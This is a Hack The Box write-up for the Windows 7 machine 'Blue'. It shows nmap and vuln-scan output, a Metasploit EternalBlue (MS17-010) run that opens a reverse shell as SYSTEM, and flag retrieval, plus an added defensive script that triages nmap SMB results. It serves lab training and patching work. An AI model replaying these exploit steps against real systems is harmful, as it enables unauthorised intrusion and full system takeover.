Blue
Port scan
root@kali:~/HTB/Machines/Blue# nmap -A -T4 -v 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-19 08:59 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:59
Completed NSE at 08:59, 0.00s elapsed
Initiating NSE at 08:59
Completed NSE at 08:59, 0.00s elapsed
Initiating NSE at 08:59
Completed NSE at 08:59, 0.00s elapsed
Initiating Ping Scan at 08:59
Scanning 10.10.10.40 [4 ports]
Completed Ping Scan at 08:59, 0.10s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 08:59
Scanning blue.htb (10.10.10.40) [1000 ports]
Discovered open port 445/tcp on 10.10.10.40
Discovered open port 139/tcp on 10.10.10.40
Discovered open port 135/tcp on 10.10.10.40
Discovered open port 49154/tcp on 10.10.10.40
Discovered open port 49155/tcp on 10.10.10.40
Discovered open port 49157/tcp on 10.10.10.40
Discovered open port 49153/tcp on 10.10.10.40
Discovered open port 49156/tcp on 10.10.10.40
Discovered open port 49152/tcp on 10.10.10.40
Completed SYN Stealth Scan at 08:59, 1.98s elapsed (1000 total ports)
Initiating Service scan at 08:59
Scanning 9 services on blue.htb (10.10.10.40)
Service scan Timing: About 44.44% done; ETC: 09:01 (0:01:08 remaining)
Completed Service scan at 09:00, 59.33s elapsed (9 services on 1 host)
Initiating OS detection (try #1) against blue.htb (10.10.10.40)
adjust_timeouts2: packet supposedly had rtt of -209048 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -209048 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -208931 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -208931 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -208952 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -208952 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -209091 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -209091 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -208956 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -208956 microseconds.  Ignoring time.
Retrying OS detection (try #2) against blue.htb (10.10.10.40)
adjust_timeouts2: packet supposedly had rtt of -208796 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -208796 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1110518 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1110518 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1160155 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1160155 microseconds.  Ignoring time.
Retrying OS detection (try #3) against blue.htb (10.10.10.40)
Retrying OS detection (try #4) against blue.htb (10.10.10.40)
adjust_timeouts2: packet supposedly had rtt of -208738 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -208738 microseconds.  Ignoring time.
Retrying OS detection (try #5) against blue.htb (10.10.10.40)
Initiating Traceroute at 09:01
Completed Traceroute at 09:01, 0.05s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 09:01
Completed Parallel DNS resolution of 2 hosts. at 09:01, 0.20s elapsed
NSE: Script scanning 10.10.10.40.
Initiating NSE at 09:01
Completed NSE at 09:01, 11.22s elapsed
Initiating NSE at 09:01
Completed NSE at 09:01, 0.00s elapsed
Initiating NSE at 09:01
Completed NSE at 09:01, 0.00s elapsed
Nmap scan report for blue.htb (10.10.10.40)
Host is up (0.043s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/19%OT=135%CT=1%CU=38945%PV=Y%DS=2%DC=T%G=Y%TM=5DD3F
OS:5AF%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%CI=I%TS=7)SEQ(SP=103%
OS:GCD=1%ISR=10C%TS=7)SEQ(SP=103%GCD=1%ISR=10C%CI=I%II=I%TS=7)OPS(O1=M54DNW
OS:8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M5
OS:4DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%
OS:T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
OS:T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=
OS:O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=
OS:Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%
OS:RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%I
OS:PL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N%T=80%C
OS:D=Z)

Uptime guess: 0.008 days (since Tue Nov 19 08:49:50 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 2s, median: 0s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-11-19T14:01:12+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-11-19T14:01:10
|_  start_date: 2019-11-19T13:50:18

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   42.90 ms 10.10.14.1
2   43.03 ms blue.htb (10.10.10.40)

NSE: Script Post-scanning.
Initiating NSE at 09:01
Completed NSE at 09:01, 0.00s elapsed
Initiating NSE at 09:01
Completed NSE at 09:01, 0.00s elapsed
Initiating NSE at 09:01
Completed NSE at 09:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.46 seconds
           Raw packets sent: 1253 (65.276KB) | Rcvd: 5213 (213.102KB)
As expected for a Windows 7 SP1 host with SMBv1 exposed, the machine is vulnerable to EternalBlue (MS17-010), which the vuln scripts confirm.
root@kali:~/HTB/Machines/Blue# nmap --script vuln 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-19 11:15 EST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for blue.htb (10.10.10.40)
Host is up (0.046s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp   open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp   open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49152/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49155/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49156/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49157/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 136.86 seconds
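As a defensive follow-up to the vuln scan above, here is an added example (not part of the original write-up) that parses nmap's smb-vuln-ms17-010 and smb-security-mode host-script output across several hosts and lists which ones still need the MS17-010 patch or SMB signing enforced. The sample nmap output embedded in it is constructed, not copied from the scan on this page.

```python
import re

# Constructed sample in the shape of nmap's SMB host-script output (not the page's scan).
SAMPLE_NMAP = """\
Nmap scan report for blue.htb (10.10.10.40)
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb-vuln-ms17-010:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
Nmap scan report for 10.10.10.41
Host script results:
| smb-security-mode:
|_  message_signing: required
|_smb-vuln-ms17-010: NT_STATUS_ACCESS_DENIED
"""
SCRIPT_LINE = re.compile(r"\|_? ?([\w-]+):\s*(.*)$")    # "| name:" header or "|_name: value"
FIELD_LINE = re.compile(r"\|_?\s{2,}([\w-]+):\s*(.*)$")  # indented "key: value" inside a block

def parse_nmap_smb(text):
    """Map each host to its MS17-010 state and SMB message-signing setting."""
    results, host, script = {}, None, None
    for line in text.splitlines():
        m = re.match(r"Nmap scan report for (\S+)", line)
        if m:
            host, script = m.group(1), None
            results[host] = {"ms17_010": None, "signing": None}
        elif host and (m := SCRIPT_LINE.match(line)):
            script, value = m.groups()
            if script == "smb-vuln-ms17-010" and value:  # one-line result, e.g. an error status
                results[host]["ms17_010"] = value
        elif host and script and (m := FIELD_LINE.match(line)):
            key, value = m.groups()
            if script == "smb-vuln-ms17-010" and key == "State":
                results[host]["ms17_010"] = value
            elif script == "smb-security-mode" and key == "message_signing":
                results[host]["signing"] = value
    return results

def triage(results):
    """Return (host, action) pairs for hosts that need remediation."""
    findings = []
    for host, r in sorted(results.items()):
        if r["ms17_010"] == "VULNERABLE":
            findings.append((host, "unpatched MS17-010: install the update and disable SMBv1"))
        if r["signing"] and r["signing"].startswith("disabled"):
            findings.append((host, "SMB signing disabled: require signing by policy"))
    return findings

if __name__ == "__main__":
    for host, action in triage(parse_nmap_smb(SAMPLE_NMAP)):
        print(f"{host}: {action}")
```

Feed it the saved output of `nmap --script "smb-vuln-ms17-010,smb-security-mode" -p445 <range>` to get the same triage for a whole subnet.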
Search exploits
root@kali:~/HTB/Machines/Blue# searchsploit ms17-010
----------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------- ----------------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code | exploits/windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | exploits/windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Executio | exploits/windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-01 | exploits/windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17 | exploits/windows_x86-64/remote/41987.py
----------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
Metasploit
root@kali:~/HTB/Machines/Blue# msfconsole
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/doublepulsar_rce           2017-04-14       great    Yes    DOUBLEPULSAR Payload Execution and Neutralization
   3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf5 exploit(windows/smb/ms17_010_eternalblue) > check

[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[+] 10.10.10.40:445 - The target is vulnerable.

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.14.34:4444
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.14.34:4444 -> 10.10.10.40:49158) at 2019-11-19 11:29:20 -0500
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

C:\Windows\system32>whoami
whoami
nt authority\system
User Flag
C:\Windows\System32>cd c:\Users
cd c:\Users

c:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of c:\Users

21/07/2017  06:56    <DIR>          .
21/07/2017  06:56    <DIR>          ..
21/07/2017  06:56    <DIR>          Administrator
14/07/2017  13:45    <DIR>          haris
12/04/2011  07:51    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  15,471,329,280 bytes free

c:\Users>type haris\Desktop\user.txt
type haris\Desktop\user.txt
<USER_FLAG>
Root Flag
c:\Users>type Administrator\Desktop\root.txt
type Administrator\Desktop\root.txt
<ROOT_FLAG>
References
- Fuzzbunch + Empire on kali - exploiting Win7 x86 target
- https://github.com/misterch0c/shadowbroker
- File:41897-spanish-how-to-exploit-eternalblue-and-doublepulsar-on-windows-72008.pdf
Daniel Simao 18:03, 21 November 2019 (EST)